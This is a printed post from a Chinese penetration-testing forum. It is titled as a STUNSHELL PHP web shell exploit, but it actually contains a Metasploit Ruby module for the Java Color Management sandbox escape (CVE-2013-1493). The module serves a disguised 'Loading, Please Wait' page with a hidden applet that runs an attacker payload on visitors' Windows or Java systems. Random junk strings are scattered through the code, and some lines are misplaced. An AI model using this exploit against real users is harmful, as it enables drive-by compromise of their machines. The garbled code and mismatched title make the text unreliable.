中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##
8 x5 l8 n, q/ b" G9 \0 B* }
) T& L7 d  V) _# L: K% \; p# This file is part of the Metasploit Framework and may be subject to
& i3 S( h% o* o) S8 R) R" q% D$ Z# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
  L% H" s+ F$ \% b  W##
2 K0 o: E0 R' e+ n. i$ j' nrequire ‘msf/core’
4 z( {6 @: K3 t$ rrequire ‘rex’
class Metasploit3 < Msf::Exploit::Remote
. S1 M4 T, @  U* C8 ^; S5 r" A; {Rank = NormalRanking
# t! G4 t& x4 X0 @7 U) _include Msf::Exploit::Remote::HttpServer::HTML
( k& _) J. n) V! `  Tinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
6 t1 f% F; H4 p0 ^This module abuses the Color Management classes from a Java Applet to run
# o* n' |/ w3 }/ w( h' p  |arbitrary Java code outside of the sandbox as exploited in the wild in February
5 \8 c5 ?- L7 m/ }& |" f) D- g9 nand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
0 G6 x2 F. [* j: w/ @! r9 }and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
- V* G2 d! p7 Z2 r5 E: t7 n& H( Qsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
( N4 X8 {8 Y/ Y+ i# M6 I# Y},
‘License’ => MSF_LICENSE,
3 G* \4 U. W( f  R/ s3 S4 m7 V7 ~! I! D‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
* r4 {1 g; y. A# k‘References’ =>
[
; Y* q/ y9 [- Q; j* p[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
! |! v( @5 @  i1 q' m1 b! ^‘Targets’ =>
: @2 a" {' F, l. t[
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
. Y* {3 f9 Y* m- K/ C) N; \}
! o$ S' @5 r% e$ @" |],
0 e8 I: M) L$ G. f[ 'Windows x86 (Native Payload)',
9 o2 N+ B  d3 `5 t+ O{
'Platform' => 'win',
'Arch' => ARCH_X86
) V- h* v  ~- C& F! v}
  V: H; o- @2 E8 I' V]
* `8 W! S" c/ I5 x6 _" g& K5 j],
‘‘DisclosureDate’ => ‘Mar 01 2013′
1 a' ^4 Q% o& c4 K: d! z" w8 N3 u))
end
3 P( e: s; B7 B' Ndef setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 |$ Y1 R. s, f- u# t* tpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
7 @' W- N+ j% N; [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
  D0 H0 _1 C- t/ Q  V@init_class_name = rand_text_alpha(“Init”.length)
1 c1 k$ X9 \- b6 {; R6 ?@init_class.gsub!(“Init”, @init_class_name)
super
end
def on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
% |, m0 ~1 k; \, Ecase request.uri
when /\.jar$/i
: G1 A4 [5 q6 d' C  Rjar = payload.encoded_jar
* w1 G4 f3 `3 [% I8 ?jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
/ y; _7 m8 P. D( ]: \jar.add_file(“MyColorSpace.class”, @color_space_class)
/ `, A1 O: j+ v5 {' {6 _DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
3 k5 R. ]0 W+ a! B/ c, _% d8 H/ _payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
4 K" k. V, @5 ]entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
4 G$ w6 A9 L; _" z; B$ j7 bentry.data = entry.data.gsub(“Payload”, payload_str)
& O# P! n" A' |( m}
jar.build_manifest
1 N) [7 {$ z) S* q  G" hsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 T0 G! h* ]- e4 g5 gwhen /\/$/
" _0 q  `) S) E; ppayload = regenerate_payload(cli)
8 A2 \6 `/ |2 G" l& @) Lif not payload
0 W/ K/ H2 \& O6 g3 Y% @print_error(“Failed to generate the payload.”)
send_not_found(cli)
return
+ e6 h$ {  ]0 l; Z- eend
3 r( e$ @. U+ O0 }send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
end
end
; D% C" r- t9 udef generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
" b6 W# ?; x! R" P, _; |html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
return html
end
end
end
' k0 K6 M, _* x& N( \

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2